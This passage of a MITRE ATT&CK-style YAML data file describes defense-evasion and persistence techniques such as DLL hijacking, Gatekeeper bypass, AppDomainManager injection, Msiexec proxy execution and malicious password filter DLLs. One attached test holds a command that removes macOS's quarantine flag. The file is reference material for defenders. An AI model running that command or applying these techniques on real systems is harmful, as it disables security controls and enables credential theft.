C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe and C:\Windows\Microsoft.NET\Framework64\v\InstallUtil.exe. 
InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS Installutil) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Travis Smith, Tripwire - Casey Smith x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '2.1' identifier: T1218.004 atomic_tests: [] T1027.008: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--2f41939b-54c3-41d6-8f8b-35f1ec18ed97 created: '2022-09-29T18:30:12.244Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1027/008 external_id: T1027.008 - source_name: intezer stripped binaries elf files 2018 description: 'Ignacio Sanmillan. (2018, February 7). Executable and Linkable Format 101. Part 2: Symbols. Retrieved September 29, 2022.' url: https://www.intezer.com/blog/malware-analysis/executable-linkable-format-101-part-2-symbols/ - source_name: SentinelLabs reversing run-only applescripts 2021 description: Phil Stokes. (2021, January 11). FADE DEAD | Adventures in Reversing Malicious Run-Only AppleScripts. Retrieved September 29, 2022. url: https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/ - source_name: Mandiant golang stripped binaries explanation description: STEPHEN ECKELS. (2022, February 28). Ready, Set, Go — Golang Internals and Symbol Recovery. Retrieved September 29, 2022. 
url: https://www.mandiant.com/resources/blog/golang-internals-symbol-recovery object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-04-15T19:58:18.337Z' name: Stripped Payloads description: |- Adversaries may attempt to make a payload difficult to analyze by removing symbols, strings, and other human readable information. Scripts and executables may contain variables names and other strings that help developers document code functionality. Symbols are often created by an operating system’s `linker` when executable payloads are compiled. Reverse engineers use these symbols and strings to analyze code and to identify functionality in payloads.(Citation: Mandiant golang stripped binaries explanation)(Citation: intezer stripped binaries elf files 2018) Adversaries may use stripped payloads in order to make malware analysis more difficult. For example, compilers and other tools may provide features to remove or obfuscate strings and symbols. Adversaries have also used stripped payload formats, such as run-only AppleScripts, a compiled and stripped version of [AppleScript](https://attack.mitre.org/techniques/T1059/002), to evade detection and analysis. 
The lack of human-readable information may directly hinder detection and analysis of payloads.(Citation: SentinelLabs reversing run-only applescripts 2021) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - macOS - Linux - Windows - Network Devices x_mitre_version: '1.2' atomic_tests: [] T1574.001: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34 created: '2020-03-13T18:11:08.357Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1574/001 external_id: T1574.001 - source_name: Hijack DLLs CrowdStrike description: " falcon.overwatch.team. (2022, December 30). 4 Ways Adversaries Hijack DLLs — and How CrowdStrike Falcon OverWatch Fights Back. Retrieved January 30, 2025." url: https://www.crowdstrike.com/en-us/blog/4-ways-adversaries-hijack-dlls/ - source_name: kroll bpl description: Dave Truman. (2024, June 24). Novel Technique Combination Used In IDATLOADER Distribution. Retrieved January 30, 2025. url: https://www.kroll.com/en/insights/publications/cyber/idatloader-distribution - source_name: Sophos description: Gabor Szappanos. (2023, May 3). A doubled “Dragon Breath” adds new air to DLL sideloading attacks. Retrieved October 3, 2025. url: https://news.sophos.com/en-us/2023/05/03/doubled-dll-sideloading-dragon-breath/ - source_name: Hexacorn DLL Hijacking description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5. Retrieved August 14, 2024. url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/ - source_name: microsoft remote preloading description: 'Microsoft. (2014, May 13). 
Microsoft Security Advisory 2269637: Insecure Library Loading Could Allow Remote Code Execution. Retrieved January 30, 2025.' url: https://learn.microsoft.com/en-us/security-updates/securityadvisories/2010/2269637 - source_name: Microsoft - manifests/assembly description: Microsoft. (2021, January 7). Manifests. Retrieved January 30, 2025. url: https://learn.microsoft.com/en-us/windows/win32/sbscs/manifests?redirectedfrom=MSDN - source_name: Microsoft redirection description: Microsoft. (2023, October 12). Dynamic-link library redirection. Retrieved January 30, 2025. url: https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection?redirectedfrom=MSDN - source_name: dll pre load owasp description: OWASP. (n.d.). Binary Planting. Retrieved January 30, 2025. url: https://owasp.org/www-community/attacks/Binary_planting - source_name: Virus Bulletin description: 'Suguru Ishimaru, Hajime Yanagishita, Yusuke Niwa. (2023, October 5). Unveiling activities of Tropic Trooper 2023: deep analysis of Xiangoop Loader and EntryShell payload. Retrieved October 3, 2025.' url: https://www.virusbulletin.com/conference/vb2023/abstracts/unveiling-activities-tropic-trooper-2023-deep-analysis-xiangoop-loader-and-entryshell-payload/ - source_name: unit 42 description: 'Tom Fakterman, Chen Erlich, & Assaf Dahan. (2024, February 22). Intruders in the Library: Exploring DLL Hijacking. Retrieved January 30, 2025.' url: https://unit42.paloaltonetworks.com/dll-hijacking-techniques/ - source_name: Wietze Beukema DLL Hijacking description: Wietze Beukema. (2020, June 22). Hijacking DLLs in Windows. Retrieved April 8, 2025. 
url: https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:35.900Z' name: 'Hijack Execution Flow: DLL' description: |- Adversaries may abuse dynamic-link library files (DLLs) in order to achieve persistence, escalate privileges, and evade defenses. DLLs are libraries that contain code and data that can be simultaneously utilized by multiple programs. While DLLs are not malicious by nature, they can be abused through mechanisms such as side-loading, hijacking search order, and phantom DLL hijacking.(Citation: unit 42) Specific ways DLLs are abused by adversaries include: ### DLL Sideloading Adversaries may execute their own malicious payloads by side-loading DLLs. Side-loading involves hijacking which DLL a program loads by planting and then invoking a legitimate application that executes their payload(s). Side-loading positions both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process. Adversaries may also side-load other packages, such as BPLs (Borland Package Library).(Citation: kroll bpl) Adversaries may chain DLL sideloading multiple times to fragment functionality hindering analysis. Adversaries using multiple DLL files can split the loader functions across different DLLs, with a main DLL loading the separated export functions. (Citation: Virus Bulletin) Spreading loader functions across multiple DLLs makes analysis harder, since all files must be collected to fully understand the malware’s behavior. 
Another method implements a “loader-for-a-loader”, where a malicious DLL’s sole role is to load a second DLL (or a chain of DLLs) that contain the real payload. (Citation: Sophos) ### DLL Search Order Hijacking Adversaries may execute their own malicious payloads by hijacking the search order that Windows uses to load DLLs. This search order is a sequence of special and standard search locations that a program checks when loading a DLL. An adversary can plant a trojan DLL in a directory that will be prioritized by the DLL search order over the location of a legitimate library. This will cause Windows to load the malicious DLL when it is called for by the victim program.(Citation: unit 42) ### DLL Redirection Adversaries may directly modify the search order via DLL redirection, which after being enabled (in the Registry or via the creation of a redirection file) may cause a program to load a DLL from a different location.(Citation: Microsoft redirection)(Citation: Microsoft - manifests/assembly) ### Phantom DLL Hijacking Adversaries may leverage phantom DLL hijacking by targeting references to non-existent DLL files. They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.(Citation: Hexacorn DLL Hijacking)(Citation: Hijack DLLs CrowdStrike) ### DLL Substitution Adversaries may target existing, valid DLL files and substitute them with their own malicious DLLs, planting them with the same name and in the same location as the valid DLL file.(Citation: Wietze Beukema DLL Hijacking) Programs that fall victim to DLL hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace, evading defenses. 
Remote DLL hijacking can occur when a program sets its current directory to a remote location, such as a Web share, before loading a DLL.(Citation: dll pre load owasp)(Citation: microsoft remote preloading) If a valid DLL is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation. kill_chain_phases: - kill_chain_name: mitre-attack phase_name: persistence - kill_chain_name: mitre-attack phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.3.0 x_mitre_contributors: - Travis Smith, Tripwire - Stefan Kanthak - Marina Liang - Ami Holeston, CrowdStrike - Will Alexander, CrowdStrike - Wietze Beukema @Wietze x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '2.1' identifier: T1574.001 atomic_tests: [] T1553.001: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--31a0a2ac-c67c-4a7e-b9ed-6a96477d4e8e created: '2020-02-05T16:16:08.471Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1553/001 external_id: T1553.001 - source_name: Application Bundle Manipulation Brandon Dalton description: 'Brandon Dalton. (2022, August 9). A bundle of nerves: Tweaking macOS security controls to thwart application bundle manipulation. Retrieved September 27, 2022.' url: https://redcanary.com/blog/mac-application-bundles/ - source_name: theevilbit gatekeeper bypass 2021 description: Csaba Fitzl. (2021, June 29). GateKeeper - Not a Bypass (Again). Retrieved September 22, 2021. 
url: https://theevilbit.github.io/posts/gatekeeper_not_a_bypass/ - source_name: OceanLotus for OS X description: Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017. url: https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update - source_name: TheEclecticLightCompany Quarantine and the flag description: hoakley. (2020, October 29). Quarantine and the quarantine flag. Retrieved September 13, 2021. url: https://eclecticlight.co/2020/10/29/quarantine-and-the-quarantine-flag/ - source_name: 'TheEclecticLightCompany apple notarization ' description: How Notarization Works. (2020, August 28). How notarization works. Retrieved September 13, 2021. url: https://eclecticlight.co/2020/08/28/how-notarization-works/ - source_name: 20 macOS Common Tools and Techniques description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021. url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:36.535Z' name: 'Subvert Trust Controls: Gatekeeper Bypass' description: |- Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. 
Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization ) Based on an opt-in system, when files are downloaded an extended attribute (xattr) called `com.apple.quarantine` (also known as a quarantine flag) can be set on the file by the application performing the download. Launch Services opens the application in a suspended state. For first run applications with the quarantine flag set, Gatekeeper executes the following functions: 1. Checks extended attribute – Gatekeeper checks for the quarantine flag, then provides an alert prompt to the user to allow or deny execution.(Citation: OceanLotus for OS X)(Citation: 20 macOS Common Tools and Techniques) 2. Checks System Policies - Gatekeeper checks the system security policy, allowing execution of apps downloaded from either just the App Store or the App Store and identified developers. 3. Code Signing – Gatekeeper checks for a valid code signature from an Apple Developer ID. 4. Notarization - Using the `api.apple-cloudkit.com` API, Gatekeeper reaches out to Apple servers to verify or pull down the notarization ticket and ensure the ticket is not revoked. Users can override notarization, which will result in a prompt of executing an “unauthorized app” and the security policy will be modified. Adversaries can subvert one or multiple security controls within Gatekeeper checks through logic errors (e.g. [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211)), unchecked file types, and external libraries. 
For example, prior to macOS 13 Ventura, code signing and notarization checks were only conducted on first launch, allowing adversaries to write malicious executables to previously opened applications in order to bypass Gatekeeper security checks.(Citation: theevilbit gatekeeper bypass 2021)(Citation: Application Bundle Manipulation Brandon Dalton) Applications and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command may not set the quarantine flag. Additionally, it is possible to avoid setting the quarantine flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Brandon Dalton @PartyD0lphin - Swasti Bhushan Deb, IBM India Pvt. Ltd. x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - macOS x_mitre_version: '1.3' identifier: T1553.001 atomic_tests: - name: Gatekeeper Bypass auto_generated_guid: fb3d46c6-9480-4803-8d7d-ce676e1f1a9b description: 'Gatekeeper Bypass via command line ' supported_platforms: - macos input_arguments: app_path: description: Path to app to be used type: path default: myapp.app executor: command: 'xattr -d com.apple.quarantine #{app_path} ' name: sh T1553.002: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082 created: '2020-02-05T16:27:37.784Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1553/002 external_id: T1553.002 - source_name: EclecticLightChecksonEXECodeSigning description: 'Howard Oakley. (2020, November 16). 
Checks on executable code in Catalina and Big Sur: a first draft. Retrieved September 21, 2022.' url: https://eclecticlight.co/2020/11/16/checks-on-executable-code-in-catalina-and-big-sur-a-first-draft/ - source_name: Securelist Digital Certificates description: Ladikov, A. (2015, January 29). Why You Shouldn’t Completely Trust Files Signed with Digital Certificates. Retrieved March 31, 2016. url: https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/ - source_name: Symantec Digital Certificates description: Shinotsuka, H. (2013, February 22). How Attackers Steal Private Keys from Digital Certificates. Retrieved March 31, 2016. url: http://www.symantec.com/connect/blogs/how-attackers-steal-private-keys-digital-certificates - source_name: Wikipedia Code Signing description: Wikipedia. (2015, November 10). Code Signing. Retrieved March 31, 2016. url: https://en.wikipedia.org/wiki/Code_signing object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:37.098Z' name: Code Signing description: "Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature.\n\nCode signing to verify software on first run can be used on modern Windows and macOS systems. It is not used on Linux due to the decentralized nature of the platform. 
(Citation: Wikipedia Code Signing)(Citation: EclecticLightChecksonEXECodeSigning)\n\nCode signing certificates may be used to bypass security policies that require signed code to execute on a system. " kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - macOS - Windows x_mitre_version: '1.2' atomic_tests: [] T1036.009: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--34a80bc4-80f2-46e6-94ff-f3265a4b657c created: '2023-09-27T19:49:40.815Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1036/009 external_id: T1036.009 - source_name: 3OHA double-fork 2022 description: Juan Tapiador. (2022, April 11). UNIX daemonization and the double fork. Retrieved September 29, 2023. url: https://0xjet.github.io/3OHA/2022/04/11/post.html - source_name: Microsoft XorDdos Linux Stealth 2022 description: 'Microsoft Threat Intelligence. (2022, May 19). Rise in XorDdos: A deeper look at the stealthy DDoS malware targeting Linux devices. Retrieved September 27, 2023.' url: https://www.microsoft.com/en-us/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/ - source_name: Sandfly BPFDoor 2022 description: The Sandfly Security Team. (2022, May 11). BPFDoor - An Evasive Linux Backdoor Technical Analysis. Retrieved September 29, 2023. 
url: https://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-04-15T21:54:02.243Z' name: Break Process Trees description: "An adversary may attempt to evade process tree-based analysis by modifying executed malware's parent process ID (PPID). If endpoint protection software leverages the “parent-child\" relationship for detection, breaking this relationship could result in the adversary’s behavior not being associated with previous process tree activity. On Unix-based systems breaking this process tree is common practice for administrators to execute software using scripts and programs.(Citation: 3OHA double-fork 2022) \n\nOn Linux systems, adversaries may execute a series of [Native API](https://attack.mitre.org/techniques/T1106) calls to alter malware's process tree. For example, adversaries can execute their payload without any arguments, call the `fork()` API call twice, then have the parent process exit. 
This creates a grandchild process with no parent process that is immediately adopted by the `init` system process (PID 1), which successfully disconnects the execution of the adversary's payload from its previous process tree.\n\nAnother example is using the “daemon” syscall to detach from the current parent process and run in the background.(Citation: Sandfly BPFDoor 2022)(Citation: Microsoft XorDdos Linux Stealth 2022) " kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Tim (Wadhwa-)Brown x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS x_mitre_version: '1.0' atomic_tests: [] T1222.001: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--34e793de-0274-4982-9c1a-246ed1c19dee created: '2020-02-04T19:17:41.767Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1222/001 external_id: T1222.001 - source_name: Hybrid Analysis Icacls1 June 2018 description: Hybrid Analysis. (2018, June 12). c9b65b764985dfd7a11d3faf599c56b8.exe. Retrieved August 19, 2018. url: https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100 - source_name: Hybrid Analysis Icacls2 May 2018 description: Hybrid Analysis. (2018, May 30). 2a8efbfadd798f6111340f7c1c956bee.dll. Retrieved August 19, 2018. url: https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110 - source_name: Microsoft Access Control Lists May 2018 description: M. Satran, M. Jacobs. (2018, May 30). Access Control Lists. Retrieved February 4, 2020. 
url: https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists - source_name: Microsoft DACL May 2018 description: Microsoft. (2018, May 30). DACLs and ACEs. Retrieved August 19, 2018. url: https://docs.microsoft.com/windows/desktop/secauthz/dacls-and-aces - source_name: EventTracker File Permissions Feb 2014 description: Netsurion. (2014, February 19). Monitoring File Permission Changes with the Windows Security Log. Retrieved August 19, 2018. url: https://www.eventtracker.com/tech-articles/monitoring-file-permission-changes-windows-security-log/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:37.826Z' name: 'File and Directory Permissions Modification: Windows File and Directory Permissions Modification' description: |- Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.). Windows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).(Citation: Microsoft DACL May 2018) Similar to a standard ACL, DACLs identify the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. 
Otherwise, access is denied.(Citation: Microsoft Access Control Lists May 2018) Adversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `cacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://attack.mitre.org/techniques/T1059/001) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574). kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '1.2' identifier: T1222.001 atomic_tests: [] T1574.014: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--356662f7-e315-4759-86c9-6214e2a50ff8 created: '2024-03-28T15:36:34.141Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1574/014 external_id: T1574.014 - source_name: PenTestLabs AppDomainManagerInject description: Administrator. (2020, May 26). APPDOMAINMANAGER INJECTION AND DETECTION. Retrieved March 28, 2024. url: https://pentestlaboratories.com/2020/05/26/appdomainmanager-injection-and-detection/ - source_name: Microsoft App Domains description: Microsoft. (2021, September 15). Application domains. Retrieved March 28, 2024. 
url: https://learn.microsoft.com/dotnet/framework/app-domains/application-domains - source_name: PwC Yellow Liderc description: PwC Threat Intelligence. (2023, October 25). Yellow Liderc ships its scripts and delivers IMAPLoader malware. Retrieved March 29, 2024. url: https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc-ships-its-scripts-delivers-imaploader-malware.html - source_name: Rapid7 AppDomain Manager Injection description: 'Spagnola, N. (2023, May 5). AppDomain Manager Injection: New Techniques For Red Teams. Retrieved March 29, 2024.' url: https://www.rapid7.com/blog/post/2023/05/05/appdomain-manager-injection-new-techniques-for-red-teams/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-04-15T21:48:08.401Z' name: AppDomainManager description: "Adversaries may execute their own malicious payloads by hijacking how the .NET `AppDomainManager` loads assemblies. The .NET framework uses the `AppDomainManager` class to create and manage one or more isolated runtime environments (called application domains) inside a process to host the execution of .NET applications. Assemblies (`.exe` or `.dll` binaries compiled to run as .NET code) may be loaded into an application domain as executable code.(Citation: Microsoft App Domains) \n\nKnown as \"AppDomainManager injection,\" adversaries may execute arbitrary code by hijacking how .NET applications load assemblies. For example, malware may create a custom application domain inside a target process to load and execute an arbitrary assembly. 
Alternatively, configuration files (`.config`) or process environment variables that define .NET runtime settings may be tampered with to instruct otherwise benign .NET applications to load a malicious assembly (identified by name) into the target process.(Citation: PenTestLabs AppDomainManagerInject)(Citation: PwC Yellow Liderc)(Citation: Rapid7 AppDomain Manager Injection)" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: persistence - kill_chain_name: mitre-attack phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Thomas B - Ivy Drexel x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '1.0' atomic_tests: [] T1218.007: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--365be77f-fc0e-42ee-bac8-4faf806d9336 created: '2020-01-24T14:38:49.266Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1218/007 external_id: T1218.007 - source_name: TrendMicro Msiexec Feb 2018 description: Co, M. and Sison, G. (2018, February 8). Attack Using Windows Installer msiexec.exe leads to LokiBot. Retrieved April 18, 2019. url: https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/ - source_name: LOLBAS Msiexec description: LOLBAS. (n.d.). Msiexec.exe. Retrieved April 18, 2019. url: https://lolbas-project.github.io/lolbas/Binaries/Msiexec/ - source_name: Microsoft msiexec description: Microsoft. (2017, October 15). msiexec. Retrieved January 24, 2020. 
url: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec - source_name: Microsoft AlwaysInstallElevated 2018 description: Microsoft. (2018, May 31). AlwaysInstallElevated. Retrieved December 14, 2020. url: https://docs.microsoft.com/en-us/windows/win32/msi/alwaysinstallelevated object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:38.626Z' name: 'Signed Binary Proxy Execution: Msiexec' description: |- Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft. Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. 
Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Ziv Kaspersky, Cymptom - Alexandros Pappas x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '2.1' identifier: T1218.007 atomic_tests: [] T1556.002: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42 created: '2020-02-11T19:05:45.829Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1556/002 external_id: T1556.002 - source_name: Clymb3r Function Hook Passwords Sept 2013 description: Bialek, J. (2013, September 15). Intercepting Password Changes With Function Hooking. Retrieved November 21, 2017. url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/ - source_name: Carnal Ownage Password Filters Sept 2013 description: Fuller, R. (2013, September 11). Stealing passwords every time they change. Retrieved November 21, 2017. url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:39.067Z' name: 'Modify Authentication Process: Password Filter DLL' description: "Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated. \n\nWindows password filters are password policy enforcement mechanisms for both domain and local accounts. 
Filters are implemented as DLLs containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts. Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation. \n\nAdversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made.(Citation: Carnal Ownage Password Filters Sept 2013)" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - kill_chain_name: mitre-attack phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: persistence x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Vincent Le Toux x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '2.1' identifier: T1556.002 atomic_tests: [] T1070.007: technique: type: attack-pattern spec_version: '2.1' id: 